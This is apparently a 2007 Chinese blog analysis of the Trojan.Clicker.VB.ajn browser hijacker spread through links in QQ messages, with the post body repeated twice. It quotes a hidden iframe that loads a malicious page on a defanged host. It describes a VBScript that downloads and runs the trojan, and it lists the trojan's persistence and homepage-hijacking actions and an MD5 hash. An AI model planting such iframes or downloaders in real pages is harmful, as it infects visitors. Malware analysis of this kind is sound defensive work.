01-29/劫持浏览器并弹广告的Trojan.Clicker.VB.ajn正通过QQ信息中的网址传播/第2版
2007-01-28 21:07
351 查看
endurer 原创
2007-01-29 第2版 补充 Kaspersky 的反应
2007-01-28 第1版
QQ收到的信息中包含网址:hxxp://hiuz***uo*ai.cn/
hxxp://hiuz***uo*ai.cn/ 的网页中包含代码:
/-------
<IFRAME marginWidth=0 marginHeight=0 src="hxxp://i***v*r.bt***fan.net/xskj.htm" frameBorder=0 width=0 scrolling=no height=0></IFRAME>
-------/
xskj.htm 的内容为Javascrīpt脚本程序,功能是输出使用escape()加密的VBscrīpt脚本程序。
该VBscrīpt脚本程序的功能是:利用 Microsoft.XMLHTTP 和 scrīpting.FileSystemObject 下载文件 xskj.exe,保存为 %temp%/svchost.exe,然后调用自定义函数yunxingexe(m5,Xskj9)。
自定义函数yunxingexe()的功能是创建Shell.Application 对象XsKjc ,利用 XsKjc 的 ShellExecute 方法 来运行 %temp%/svchost.exe。
xskj.exe 采用 Microsoft Visual Basic 5.0 / 6.0 开发。
/-------
文件说明符 : D:/test/xskj.exe
属性 : A---
语言 : 中文(中国)
文件版本 : 1.00
说明 : SVCH0ST
版权 : SVCH0ST
备注 : SVCH0ST
产品版本 : 1.00
产品名称 : SVCH0ST
公司名称 : SVCH0ST
合法商标 : SVCH0ST
内部名称 : XC0PY
源文件名 : XC0PY.exe
创建时间 : 2007-1-28 20:13:3
修改时间 : 2007-1-28 20:13:4
访问时间 : 2007-1-28 0:0:0
大小 : 40960 字节 40.0 KB
MD5 : 20618f0ff18554c840b74494b5e8594c
-------/
其主要功能是:
/-------
1、在注册表的run键下创建启动项SVCH0ST,实现开机自启动
2、修改hosts文件
3、修改注册表,使IE首页变为:hxxp://i***v*r.bt***fan.net/index.html,并禁止用户通过Internet选项来修改首页
4、弹广告窗口
-------/
瑞星报为:Trojan.Clicker.VB.ajn。
瑞星升级报告:19.07.02版新增82个可查杀病毒
来源:瑞星公司 时间:2007-01-22 16:01:05
http://it.rising.com.cn/Channels/Anti_Virus/Upgrade_Report/2007-01-22/1169456324d40068.shtml
列在第59位。
Kaspersky 报为:Trojan.Win32.StartPage.ana
2007-01-29 第2版 补充 Kaspersky 的反应
2007-01-28 第1版
QQ收到的信息中包含网址:hxxp://hiuz***uo*ai.cn/
hxxp://hiuz***uo*ai.cn/ 的网页中包含代码:
/-------
<IFRAME marginWidth=0 marginHeight=0 src="hxxp://i***v*r.bt***fan.net/xskj.htm" frameBorder=0 width=0 scrolling=no height=0></IFRAME>
-------/
xskj.htm 的内容为Javascrīpt脚本程序,功能是输出使用escape()加密的VBscrīpt脚本程序。
该VBscrīpt脚本程序的功能是:利用 Microsoft.XMLHTTP 和 scrīpting.FileSystemObject 下载文件 xskj.exe,保存为 %temp%/svchost.exe,然后调用自定义函数yunxingexe(m5,Xskj9)。
自定义函数yunxingexe()的功能是创建Shell.Application 对象XsKjc ,利用 XsKjc 的 ShellExecute 方法 来运行 %temp%/svchost.exe。
xskj.exe 采用 Microsoft Visual Basic 5.0 / 6.0 开发。
/-------
文件说明符 : D:/test/xskj.exe
属性 : A---
语言 : 中文(中国)
文件版本 : 1.00
说明 : SVCH0ST
版权 : SVCH0ST
备注 : SVCH0ST
产品版本 : 1.00
产品名称 : SVCH0ST
公司名称 : SVCH0ST
合法商标 : SVCH0ST
内部名称 : XC0PY
源文件名 : XC0PY.exe
创建时间 : 2007-1-28 20:13:3
修改时间 : 2007-1-28 20:13:4
访问时间 : 2007-1-28 0:0:0
大小 : 40960 字节 40.0 KB
MD5 : 20618f0ff18554c840b74494b5e8594c
-------/
其主要功能是:
/-------
1、在注册表的run键下创建启动项SVCH0ST,实现开机自启动
2、修改hosts文件
3、修改注册表,使IE首页变为:hxxp://i***v*r.bt***fan.net/index.html,并禁止用户通过Internet选项来修改首页
4、弹广告窗口
-------/
瑞星报为:Trojan.Clicker.VB.ajn。
瑞星升级报告:19.07.02版新增82个可查杀病毒
来源:瑞星公司 时间:2007-01-22 16:01:05
http://it.rising.com.cn/Channels/Anti_Virus/Upgrade_Report/2007-01-22/1169456324d40068.shtml
列在第59位。
Kaspersky 报为:Trojan.Win32.StartPage.ana
相关文章推荐
- 盗取QQ密码的Trojan.PSW.QQPass.rky正通过QQ信息中的网址传播
- 03-29/小心QQ信息中的网址传播Trojan-PSW.Win32.Delf.qc/Trojan.PSW.Liumazi.kr(2版)
- 木马Trojan.Agent.ace 通过QQ信息中的网址传播
- Trojan-PSW.Win32.QQPass.ro通过QQ信息中网页传播
- 小心QQ信息的网址传播 Backdoor.Win32.Agent.ahj
- 小心通过QQ尾巴中的网址(Q-Zone.****qq.C0M)传播的Worm.Win32.Viking.r
- 小心QQ信息中的网址传播维金Worm.Win32.Viking.ix/Worm.Viking.pg
- 如果向某网址Post信息,并得到CookieContainer以便以后直接通过验证
- [存底]如何向某网址Post信息,并得到CookieContainer以便以后直接通过验证
- 信达国际机构(代考)为骗子公司,网址http://www.xdtk.org/,qq:22700598,请大家代为传播
- 如何向某网址Post信息,并得到CookieContainer以便以后直接通过验证
- 昨天才提醒,今天就有网友点击QQ信息中的网址,中Worm.Viking.pk/Worm.Win32.Viking.jg了
- thinkphp通过浏览器ua信息判断访客为手机端或PC端的方法
- QQ的很多功能和信息可以通过web方式获得~以下链接,星号应换成你要查询的QQ号 ZT
- 免费刷会员和六钻工具?小心通过QQ传播的灰鸽子Backdoor.Win32.Gpigeon.gem
- 如何通过js给QQ好友发送信息
- SeimiAgent使用--通过js控制以浏览器级效果登录爬取京东信息
- 如何向某网址Post信息,并得到CookieContainer以便以后直接通过验证
- 通过链接启动QQ并发信息
- 网络广告代理商是如何通过 cookie 收集用户信息的?